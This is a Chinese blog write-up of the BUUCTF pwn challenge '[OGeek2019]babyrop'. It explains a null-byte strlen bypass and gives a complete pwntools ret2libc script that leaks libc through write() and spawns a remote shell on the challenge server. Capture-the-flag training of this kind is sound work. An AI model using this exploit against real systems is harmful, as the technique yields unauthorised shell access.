BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】

保护

ida

s是随机值,不可能让输入的buf和s相等,所以使用字符串截断绕过strlen()

注意buf[v5-1]=0对buf的修改

让buf[7]很大,最大\xff,即255,即可满足栈溢出。

准备 无

exp

from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/pwn")
#i=process("/home/error/桌面/pwn")
i=remote("node4.buuoj.cn",29715)

p1=b"\x00"+b"a"*6+b"\xff"#这里的构造是重点
i.sendline(p1)
i.recvline()

write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x08048825

p2=cyclic(0xE7+4)+flat([write_plt,main,1,write_got,4])
i.sendline(p2)
write_addr=u32(i.recv(4))
print(hex(write_addr))

libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
she_addr=libc_base+libc.dump("str_bin_sh")

p2=cyclic(0xe7+4)+flat([sys_addr,0,she_addr])
i.sendline(p1)
i.sendline(p2)
i.interactive()










结果

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值